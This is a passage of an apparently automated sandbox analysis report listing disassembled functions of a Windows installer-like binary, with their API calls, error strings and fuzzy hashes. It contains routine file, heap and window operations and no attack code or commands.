                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 00888EA1
                                                            Strings
                                                            • cache.cpp, xrefs: 00888E65
                                                            • Failed to initialize ACL., xrefs: 00888E6F
                                                            • Failed to allocate administrator SID., xrefs: 00888E1D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AttributesErrorFileInitializeLast
                                                            • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                            • API String ID: 669721577-1117388985
                                                            • Opcode ID: 0781c039964ceb6b4e38404bb20d89c68c1ce2b5491f9c59f74c9dbad5e2ab7f
                                                            • Instruction ID: 99fb131cdaf48ca4194eec32bddb133e66864e3ebb0e05c0105b26e467cbe760
                                                            • Opcode Fuzzy Hash: 0781c039964ceb6b4e38404bb20d89c68c1ce2b5491f9c59f74c9dbad5e2ab7f
                                                            • Instruction Fuzzy Hash: 5621A872E40224F7DB21BA999C85F9FB779FF44B10F514129B914FB280DB749D009791
                                                            Function 00874212 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,00884028,00000001,feclient.dll,?,00000000,?,?,?,00874B12), ref: 0087424D
                                                            • GetLastError.KERNEL32(?,?,00884028,00000001,feclient.dll,?,00000000,?,?,?,00874B12,?,?,008BB488,?,00000001), ref: 00874259
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,00884028,00000001,feclient.dll,?,00000000,?,?,?,00874B12,?), ref: 00874294
                                                            • GetLastError.KERNEL32(?,?,00884028,00000001,feclient.dll,?,00000000,?,?,?,00874B12,?,?,008BB488,?,00000001), ref: 0087429E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryErrorLast
                                                            • String ID: crypt32.dll$dirutil.cpp
                                                            • API String ID: 152501406-1104880720
                                                            • Opcode ID: 27b04385a89b69e26c4ce91cef8410d6581358d57a9067ef8b9d3735d2283f61
                                                            • Instruction ID: 50631c36d79357742fac849e00f04f4bea621ed6f16e3d188f03c998d4679367
                                                            • Opcode Fuzzy Hash: 27b04385a89b69e26c4ce91cef8410d6581358d57a9067ef8b9d3735d2283f61
                                                            • Instruction Fuzzy Hash: 4D110A33E11637AB97215AD94C8466BBB58FF047607159235FE08E7316E770DC1086E0
                                                            Function 00890B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • Unexpected call to CabWrite()., xrefs: 00890BC1
                                                            • cabextract.cpp, xrefs: 00890C2B
                                                            • Failed to write during cabinet extraction., xrefs: 00890C35
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite_memcpy_s
                                                            • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                            • API String ID: 1970631241-3111339858
                                                            • Opcode ID: 12fc3b8a3d590303312e15a954476a7256d68773e6dc3aa8029d642d4cbca0b2
                                                            • Instruction ID: dfbf5e6ee19e508d3e1af22d24e4db6338de63805d0599c242a20be016e66a44
                                                            • Opcode Fuzzy Hash: 12fc3b8a3d590303312e15a954476a7256d68773e6dc3aa8029d642d4cbca0b2
                                                            • Instruction Fuzzy Hash: 2E21FF76540205AFCF14EF5CCC85D5A37B8FF84328B294259FE14CB345E671D9009B61
                                                            Function 00879AE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879AFB
                                                            • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,0087A8B4,00000100,000002C0,000002C0,00000100), ref: 00879B10
                                                            • GetLastError.KERNEL32(?,0087A8B4,00000100,000002C0,000002C0,00000100), ref: 00879B1B
                                                            Strings
                                                            • Failed to format variable string., xrefs: 00879B06
                                                            • Failed to set variable., xrefs: 00879B7A
                                                            • Failed while searching directory search: %ls, for path: %ls, xrefs: 00879B54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AttributesErrorFileLastOpen@16
                                                            • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                            • API String ID: 1811509786-402580132
                                                            • Opcode ID: c9e3691855b1abb9e2b3dd2d9df4ceddbf287c0040c8a13356cd571732c97872
                                                            • Instruction ID: 6c049d931e3aa72d5b70c62b9bb2c05572b49421fc9932673023d386c5031bec
                                                            • Opcode Fuzzy Hash: c9e3691855b1abb9e2b3dd2d9df4ceddbf287c0040c8a13356cd571732c97872
                                                            • Instruction Fuzzy Hash: 12112932940536BBDB221698AC82FAEB728FF11374F118321FD58F62A4C761ED10E6D1
                                                            Function 00890C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00890CC4
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00890CD6
                                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 00890CE9
                                                            • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,008908B1,?,?), ref: 00890CF8
                                                            Strings
                                                            • cabextract.cpp, xrefs: 00890C93
                                                            • Invalid operation for this state., xrefs: 00890C9D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Time$File$CloseDateHandleLocal
                                                            • String ID: Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 609741386-1751360545
                                                            • Opcode ID: e6d2981dd29c1ec2aea3eda5d28271891e7b87f6a4ee56b2120ecea52f447507
                                                            • Instruction ID: cd439e675bc72180b8a2f020e935b52c6131b8ce4e19e3a3bb1f729906c3cea4
                                                            • Opcode Fuzzy Hash: e6d2981dd29c1ec2aea3eda5d28271891e7b87f6a4ee56b2120ecea52f447507
                                                            • Instruction Fuzzy Hash: 1721D57280061DAF8B10AFA8CD099FA7BBCFF047247148316F865D6690D374E951CF90
                                                            Function 00884A77 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,0088539D), ref: 00884AC3
                                                            Strings
                                                            • pipe.cpp, xrefs: 00884AFB
                                                            • Failed to allocate message to write., xrefs: 00884AA2
                                                            • Failed to write message type to pipe., xrefs: 00884B05
                                                            • crypt32.dll, xrefs: 00884A7D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
                                                            • API String ID: 3934441357-606776022
                                                            • Opcode ID: 186f65208c2d4906fa3fd3785537563c470b3ef52ebe52eea239aaf5d81aac0f
                                                            • Instruction ID: e8d226661cee526c0b5ff9a9ea6b98370636134350278f89f1ea56d4224bd2b1
                                                            • Opcode Fuzzy Hash: 186f65208c2d4906fa3fd3785537563c470b3ef52ebe52eea239aaf5d81aac0f
                                                            • Instruction Fuzzy Hash: 62116A3398012ABADB25AF89DD05AAE7AB8FB40760F114165F900FA240E771DE50D7A1
                                                            Function 00884642 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • _memcpy_s.LIBCMT ref: 00884693
                                                            • _memcpy_s.LIBCMT ref: 008846A6
                                                            • _memcpy_s.LIBCMT ref: 008846C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _memcpy_s$Heap$AllocateProcess
                                                            • String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
                                                            • API String ID: 886498622-766083570
                                                            • Opcode ID: 4b8e362e2c0f28fd13b870912a68caf1d175dae753c1002e4fd4edf43b6e7025
                                                            • Instruction ID: f3de8ca89db242d2b547c442643282258d71d8cf9413cd9dfbbe13dafaa1fea9
                                                            • Opcode Fuzzy Hash: 4b8e362e2c0f28fd13b870912a68caf1d175dae753c1002e4fd4edf43b6e7025
                                                            • Instruction Fuzzy Hash: 60119EB354020EABDB01EE98CC82DEB77ACFF15B10B00852AFA15DB251E771D65487E2
                                                            Function 008B3C72 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShellExecuteExW.SHELL32(?), ref: 008B3CC0
                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 008B3CCA
                                                            • CloseHandle.KERNEL32(?,?,?,00000000), ref: 008B3CFD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseErrorExecuteHandleLastShell
                                                            • String ID: <$PDu$shelutil.cpp
                                                            • API String ID: 3023784893-2418939910
                                                            • Opcode ID: cb17be7623f5bcf1706121817c1e44d6119ad534a8390503b487f4482832303b
                                                            • Instruction ID: 61e41daeb03f4dd8b4bbd8bafadbb6428b773eba6c65c876cf6a6fd4020ee1cc
                                                            • Opcode Fuzzy Hash: cb17be7623f5bcf1706121817c1e44d6119ad534a8390503b487f4482832303b
                                                            • Instruction Fuzzy Hash: 2E11C2B5E01229ABCB10DFA9D845ADEBBB8FB08750F10412AFD15F7340E7309A108BA5
                                                            Function 00879A4D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00879AC4
                                                            Strings
                                                            • Failed to get Condition inner text., xrefs: 00879A94
                                                            • Failed to select condition node., xrefs: 00879A7B
                                                            • Failed to copy condition string from BSTR, xrefs: 00879AAE
                                                            • `<u, xrefs: 00879AC4
                                                            • Condition, xrefs: 00879A5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeString
                                                            • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`<u
                                                            • API String ID: 3341692771-266405526
                                                            • Opcode ID: 02fd900acf28c73bba5194534cbfd992bb0b4b3115d98cba9556426a92e929d2
                                                            • Instruction ID: b17388b932d6c8b6b2e71ad92fb5f151b8353a43b730b2b5a82e984013b362f3
                                                            • Opcode Fuzzy Hash: 02fd900acf28c73bba5194534cbfd992bb0b4b3115d98cba9556426a92e929d2
                                                            • Instruction Fuzzy Hash: EA117C31942339BBCB169A94CD16FEDBB68FB00725F108254F848EA354D7B5DE00D684
                                                            Function 008B96CD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 0-1718035505
                                                            • Opcode ID: cabec4fe665805c5680dd6096478fb42fc324e2d5b48161bd480de5a3f316828
                                                            • Instruction ID: 9d446a0a8fede1c4a8ffb479be234c585f006070a9e867dbb87649d7b5c32d57
                                                            • Opcode Fuzzy Hash: cabec4fe665805c5680dd6096478fb42fc324e2d5b48161bd480de5a3f316828
                                                            • Instruction Fuzzy Hash: BA01F471696623DB4F301FA56CC0AE723C8FA26391311427BE7B5D3340EF51C8469694
                                                            Function 008B0ACC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00875EB2,00000000), ref: 008B0AE0
                                                            • GetProcAddress.KERNEL32(00000000), ref: 008B0AE7
                                                            • GetLastError.KERNEL32(?,?,?,00875EB2,00000000), ref: 008B0AFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
                                                            • String ID: IsWow64Process$kernel32$procutil.cpp
                                                            • API String ID: 4275029093-1586155540
                                                            • Opcode ID: 2aa1250e9f32565920f53935be95ba117bd9bf3e325abdd2c91b5e7fe2fffc7b
                                                            • Instruction ID: f56621a9e8f03724fee9d53b85bde467f1c24f6348f0d5583652d298af6097ba
                                                            • Opcode Fuzzy Hash: 2aa1250e9f32565920f53935be95ba117bd9bf3e325abdd2c91b5e7fe2fffc7b
                                                            • Instruction Fuzzy Hash: E7F0A472E44629A7C720AB959C09DEFBB68FB00761B014255BD14E7340EBB4DD01DBD1
                                                            Function 008AA20B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008A3479,008A3479,?,?,?,008AA45C,00000001,00000001,ECE85006), ref: 008AA265
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008AA45C,00000001,00000001,ECE85006,?,?,?), ref: 008AA2EB
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008AA3E5
                                                            • __freea.LIBCMT ref: 008AA3F2
                                                              • Part of subcall function 008A521A: HeapAlloc.KERNEL32(00000000,?,?,?,008A1F87,?,0000015D,?,?,?,?,008A33E0,000000FF,00000000,?,?), ref: 008A524C
                                                            • __freea.LIBCMT ref: 008AA3FB
                                                            • __freea.LIBCMT ref: 008AA420
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocHeap
                                                            • String ID:
                                                            • API String ID: 3147120248-0
                                                            • Opcode ID: f75c333828eb1dcde7c478b23051aa27f44e7692d391da54d13c57ac3095ae57
                                                            • Instruction ID: efd78b168139fe95a89d4bd064e19a0bab4a9741d97860736c4c7c9cf2c1928e
                                                            • Opcode Fuzzy Hash: f75c333828eb1dcde7c478b23051aa27f44e7692d391da54d13c57ac3095ae57
                                                            • Instruction Fuzzy Hash: 9F510472610216AFFF298E68CC41EBF77A9FB46750F144228FD04DAA40EBB5DC80C652
                                                            Function 00888CAC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(000007D0,00000000,00000000), ref: 00888D18
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
                                                            • API String ID: 3472027048-398165853
                                                            • Opcode ID: 7b03912b4766551e241f8530a333d13aea42f3c17a8a18ae5c6b71d156f42fa1
                                                            • Instruction ID: 14bb80044c8b98a4c64167c24b1744f20bd2099896ec3359c5d4066760a8b482
                                                            • Opcode Fuzzy Hash: 7b03912b4766551e241f8530a333d13aea42f3c17a8a18ae5c6b71d156f42fa1
                                                            • Instruction Fuzzy Hash: 7431A172A40629FBEB22B6588C42FBE726DFF20750F514025FD04FB281EA75DD1057A2
                                                            Function 0088E956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000082,?,?), ref: 0088E985
                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0088E994
                                                            • SetWindowLongW.USER32(?,000000EB,?), ref: 0088E9A8
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0088E9B8
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0088E9D2
                                                            • PostQuitMessage.USER32(00000000), ref: 0088EA31
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$Proc$MessagePostQuit
                                                            • String ID:
                                                            • API String ID: 3812958022-0
                                                            • Opcode ID: 262fece214e9a4e7ac06c27797c4800d636be08f1e263af1256a30c57311c8fe
                                                            • Instruction ID: 70b71576be9f8be5402e750acf34eb8c6f97b1bf125adae8d36254b4a76cd6d6
                                                            • Opcode Fuzzy Hash: 262fece214e9a4e7ac06c27797c4800d636be08f1e263af1256a30c57311c8fe
                                                            • Instruction Fuzzy Hash: 5921F531104218BFDF15AF68DC48E6A3FA5FF58710F144618F90AEA2A4C771DD10DB51
                                                            Function 0088C7C9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 164synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • elevation.cpp, xrefs: 0088C9B8
                                                            • Unexpected elevated message sent to child process, msg: %u, xrefs: 0088C9C4
                                                            • Failed to save state., xrefs: 0088C891
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleMutexRelease
                                                            • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                            • API String ID: 4207627910-1576875097
                                                            • Opcode ID: 8b10ef81f01f241a1c95291a008c8643c080907d11fb8b4373f8ccf793e40ef8
                                                            • Instruction ID: 9b1d5dc3bc1582baf69cb62f4f03366ced281611b42a1ab72b2fd7a717fa9097
                                                            • Opcode Fuzzy Hash: 8b10ef81f01f241a1c95291a008c8643c080907d11fb8b4373f8ccf793e40ef8
                                                            • Instruction Fuzzy Hash: 1061B73A100514EFCB126F84CE01C55BFB2FF48314715C599FAA99A636C732E921EF56
                                                            Function 008B7B16 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7C74
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7C7F
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7C8A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
